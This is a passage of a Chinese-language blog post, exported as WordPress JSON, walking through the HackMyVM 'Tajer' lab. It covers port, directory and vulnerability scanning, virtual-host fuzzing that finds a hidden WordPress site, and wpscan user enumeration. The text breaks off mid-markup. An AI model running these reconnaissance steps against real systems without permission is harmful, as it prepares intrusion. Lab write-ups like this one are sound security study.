{"id":512,"date":"2024-04-06T18:41:33","date_gmt":"2024-04-06T10:41:33","guid":{"rendered":"http:\/\/162.14.82.114\/?p=512"},"modified":"2024-04-06T18:41:33","modified_gmt":"2024-04-06T10:41:33","slug":"hmv-_-tajer","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/512\/04\/06\/2024\/","title":{"rendered":"hmv[-_-]Tajer"},"content":{"rendered":"<h1>Tajer<\/h1>\n<p>\u4eca\u5929\u542c\u7fa4\u4e3b\u5e08\u5085\u8bf4\u597d\u50cf\u548cwifi\u6709\u5173\uff0c\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840088.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840088.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406145815222\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 172.20.10.4 -- -A <\/code><\/pre>\n<pre><code class=\"language-css\">PORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 8.4p1 Debian 5 (protocol 2.0)\n| ssh-hostkey: \n|   3072 27:71:24:58:d3:7c:b3:8a:7b:32:49:d1:c8:0b:4c:ba (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCjRCpLEF00zJy\/GkOtP8umEO3vDUpsiovHmmmfKN5njf5d4aqXBW3wUjqVL3VotabyslG6gNZnaPODVt2z3MdHsyNBuJZrbRrN26Dmz3x6pzJPnizxq2AXGzfgL89jQi83yr72gb2FpxGXm8BqYTTXwbiF7NIi+ekTmRWBa6LUQHgirqggrUq5xdmj0lTu+lMQ2Tzy4xfL6BKgyg4IaZlO9Kz9Z02ghG6VDr2vV9aInO4gu\/i2nlvM+aErvWyREoqspjvhgPd0Q950AkOkKfjD5hHxLFZo7aR3PHJev+8zrKwsv\/6bUAQIl8nUYifu\/a+1vpSddyl37ikQNLY7RsCboBNtPryz7czF1UUtWMlICTHegrchZT3FEr+c5g51hEj+AkwwQoan2y8SCMhKIbWQQH0qBWNXnfNpKGS5y8Vn8s6KqZlsPq49\/k9Pmr0jplaqgKDrPuiddGOehu5Yh6Fg5jsk5c5zXttWY17TyJdeab1LBOBJMY2ur4ZnSh+zv7E=\n|   256 e2:30:67:38:7b:db:9a:86:21:01:3e:bf:0e:e7:4f:26 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOAIZW58yN\/LbK35zNnyYvo4vNm1bnBkyDn4KzLYYyGBG2owUbmMp8WcmKWxT5ImSPDUE24mlhafaDEb8smp1Mc=\n|   256 5d:78:c5:37:a8:58:dd:c4:b6:bd:ce:b5:ba:bf:53:dc (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB57U+4lDKyoTXGtTCBdDtmnL1YvIhNjQpbp\/tdjDYGx\n80\/tcp open  http    syn-ack nginx 1.18.0\n| http-methods: \n|_  Supported Methods: GET HEAD\n|_http-title: Welcome to nginx!\n|_http-server-header: nginx\/1.18.0\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">gobuster dir -u http:\/\/172.20.10.4 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt <\/code><\/pre>\n<pre><code class=\"language-css\">===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/172.20.10.4\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\nProgress: 220560 \/ 220561 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<p>\u6bdb\u90fd\u6ca1\u6709\uff0c\u4e0d\u662f\u8981\u505adns\u5c31\u662f\u6709\u522b\u7684\u732b\u817b\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-css\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ sudo dirsearch -u http:\/\/172.20.10.4\/ -e* -i 200,300-399 2&gt;\/dev\/null\n[sudo] password for kali: \n  _|. _ _  _  _  _ _|_    v0.4.3\n (_||| _) (\/_(_|| (_| )\nExtensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594\nOutput File: \/home\/kali\/reports\/http_172.20.10.4\/__24-04-06_03-01-31.txt\nTarget: http:\/\/172.20.10.4\/\n[03:01:31] Starting: \nTask Completed<\/code><\/pre>\n<p>\u597d\u5bb6\u4f19\u3002\u3002\u3002\u3002\u3002<\/p>\n<h3>\u6f0f\u6d1e\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">nikto -h http:\/\/172.20.10.4<\/code><\/pre>\n<pre><code class=\"language-css\">- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP:          172.20.10.4\n+ Target Hostname:    172.20.10.4\n+ Target Port:        80\n+ Start Time:         2024-04-06 03:03:02 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: nginx\/1.18.0\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use &#039;-C all&#039; to force check all possible dirs)\n+ \/#wp-config.php#: #wp-config.php# file found. This file contains the credentials.\n+ 8102 requests: 0 error(s) and 3 item(s) reported on remote host\n+ End Time:           2024-04-06 03:03:10 (GMT-4) (8 seconds)\n---------------------------------------------------------------------------<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u6316\u6398<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<pre><code class=\"language-html\">&lt;!DOCTYPE html&gt;\n&lt;html&gt;\n&lt;head&gt;\n&lt;title&gt;Welcome to nginx!&lt;\/title&gt;\n&lt;style&gt;\n    body {\n        width: 35em;\n        margin: 0 auto;\n        font-family: Tahoma, Verdana, Arial, sans-serif;\n    }\n&lt;\/style&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n&lt;h1&gt;Welcome to nginx!&lt;\/h1&gt;\n&lt;p&gt;If you see this page, the nginx web server is successfully installed and\nworking. Further configuration is required.&lt;\/p&gt;\n\n&lt;p&gt;For online documentation and support please refer to\n&lt;a href=&quot;http:\/\/nginx.org\/&quot;&gt;nginx.org&lt;\/a&gt;.&lt;br\/&gt;\nCommercial support is available at\n&lt;a href=&quot;http:\/\/nginx.com\/&quot;&gt;nginx.com&lt;\/a&gt;.&lt;\/p&gt;\n\n&lt;p&gt;&lt;em&gt;Thank you for using nginx.&lt;\/em&gt;&lt;\/p&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;<\/code><\/pre>\n<p>\u3002\u3002\u3002\u3002\u3002\u3002\u3002\u5636<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840091.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840091.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406150436690\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u67e5\u627e\u4e2d\u95f4\u4ef6\u6f0f\u6d1e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840092.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840092.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406150540318\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u7edd\u4e86\u3002\u3002\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840093.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840093.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406150651767\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840094.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840094.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406150700945\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\uff1f\uff1f\uff1f\uff1f\uff1f\uff1f\uff1f\u770b\u4e00\u4e0b\u626b\u63cf\u5f97\u5230\u7684\u4fe1\u606f\uff1a\u6bdb\u90fd\u6ca1\u6709\u3002\u3002\u3002\u518d\u5206\u6790\u4e00\u4e0b\u8bf7\u6c42\u548c\u76f8\u5e94\u5305\uff0c\u6ca1\u53d1\u73b0\u4e1c\u897f\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840095.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840095.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406151334587\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840096.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840096.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406151351958\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4e0d\u77e5\u9053\u6709\u6ca1\u6709\u7528\uff1a<a href=\"https:\/\/wiki.96.mk\/Web%E5%AE%89%E5%85%A8\/Nginx\/%EF%BC%88CVE-2020-12440%EF%BC%89Nginx%20%3C%3D%201.8.0%20%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81\/\">https:\/\/wiki.96.mk\/Web%E5%AE%89%E5%85%A8\/Nginx\/%EF%BC%88CVE-2020-12440%EF%BC%89Nginx%20%3C%3D%201.8.0%20%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81\/<\/a><\/p>\n<p>\u8fd9\u65f6\u5019\u60f3\u8d77\u6765<code>hikto<\/code>\u8fd8\u8fd8\u770b\uff0c\u53d1\u73b0\u4e86\u4e00\u4e2a<code>wp-config.php<\/code>\u6587\u4ef6\uff0c\u6253\u5f00\u770b\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840097.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840097.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406152259788\" \/><\/div><\/p>\n<p>\u80af\u5b9a\u505a\u89e3\u6790\u4e86\uff01\u4f46\u662f\u6ca1\u627e\u5230\u554a\uff0c\u603b\u4e0d\u80fd\u65e0\u4e2d\u751f\u6709\u5427\u3002\u3002\u3002\u73a9\u4e2a\u9e21\u6bdb\u3002\u3002\u770b\u522b\u4eba\u7684wp\u91cc\u4e5f\u6ca1\u63d0\u5230\u8fd9\u91cc\u7684\u89e3\u6790\u4ece\u54ea\u6765\u554a\u3002\u3002\u3002\u3002\u90a3\u5c31\u662f\u786c\u731c\uff1f<\/p>\n<pre><code class=\"language-apl\"># \/etc\/hosts\n172.20.10.4  tajer.hmv<\/code><\/pre>\n<p>\u597d\u50cf\u5f88\u591a\u56fd\u5916\u7684\u5e08\u5085\u4e60\u60ef\u5728\u505a\u9898\u4e4b\u524d\u641e\u4e00\u4e2adns\u89e3\u6790\uff0c\u4f46\u662f\u6211\u6ca1\u8fd9\u4e2a\u4e60\u60ef\u3002<\/p>\n<h3>\u4fe1\u606f\u641c\u96c6 + \u6a21\u7cca\u6d4b\u8bd5<\/h3>\n<pre><code class=\"language-bash\">gobuster dir -u http:\/\/tajer.hmv -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt <\/code><\/pre>\n<pre><code class=\"language-css\">===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/tajer.hmv\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\nProgress: 220560 \/ 220561 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<p>\u3002\u3002\u3002\u3002\u3002FUZZ\u4e00\u4e0b\uff0c\u7531\u4e8e\u626b\u63cf\u8fc7\u6162\uff0c\u6211\u540c\u65f6\u4f7f\u7528\u4e86\u4e24\u4e2a\u8fdb\u884c\u626b\u63cf\uff1a<\/p>\n<pre><code class=\"language-bash\">ffuf -u http:\/\/FUZZ.tajer.hmv -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-110000.txt <\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840098.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840098.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406154845977\" style=\"zoom:33%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">wfuzz -u http:\/\/tajer.FUZZ.hmv -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt <\/code><\/pre>\n<p>\u4f46\u662f\u51fa\u73b0\u4e86\u62a5\u9519\uff1a<\/p>\n<pre><code class=\"language-text\">Pycurl error 6: Could not resolve host: tajer.blog.hmv<\/code><\/pre>\n<p>\u4fee\u6539\u4e00\u4e0b\u91cd\u65b0\u626b\u63cf\uff1a<\/p>\n<pre><code class=\"language-bash\">ffuf -u http:\/\/172.20.10.4 -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt -H &quot;Host: FUZZ.tajer.hmv&quot; -fs 612<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840099.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840099.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406155902283\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">wfuzz -u http:\/\/tajer.FUZZ.hmv -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt --ip 172.20.10.4 <\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840100.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840100.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406155201087\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6210\u529f\u4e86\uff0c\u5ffd\u7565\u4e00\u4e0b\u91cd\u590d\u7684\uff1a<\/p>\n<pre><code class=\"language-bash\">wfuzz -u http:\/\/tajer.FUZZ.hmv -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt --ip 172.20.10.4 --hw 69<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840101.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840101.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406155406987\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u62ff\u5230\u4e86<code>tajer.wordpress.hmv<\/code>\uff0c\u5df2\u7ecf\u6c57\u6d41\u6d43\u80cc\u4e86\u3002 <\/p>\n<pre><code class=\"language-apl\">172.20.10.4   tajer.wordpress.hmv<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840103.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840103.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406160041851\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u725b\u6279\u3002\u3002\u3002\u3002<\/p>\n<h3>\u4fe1\u606f\u4e8c\u6b21\u6536\u96c6<\/h3>\n<h4>\u76ee\u5f55\u626b\u63cf<\/h4>\n<pre><code class=\"language-bash\">gobuster dir -u http:\/\/tajer.wordpress.hmv -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt<\/code><\/pre>\n<pre><code class=\"language-text\">\/wp-content           (Status: 301) [Size: 169] [--&gt; http:\/\/tajer.wordpress.hmv\/wp-content\/]\n\/wp-includes          (Status: 301) [Size: 169] [--&gt; http:\/\/tajer.wordpress.hmv\/wp-includes\/]\n\/wp-admin             (Status: 301) [Size: 169] [--&gt; http:\/\/tajer.wordpress.hmv\/wp-admin\/]<\/code><\/pre>\n<h4>wpscan\u626b\u63cf<\/h4>\n<pre><code class=\"language-bash\">wpscan --url http:\/\/tajer.wordpress.hmv\/ -e u<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840104.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840104.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406160614482\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840105.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840105.png\" 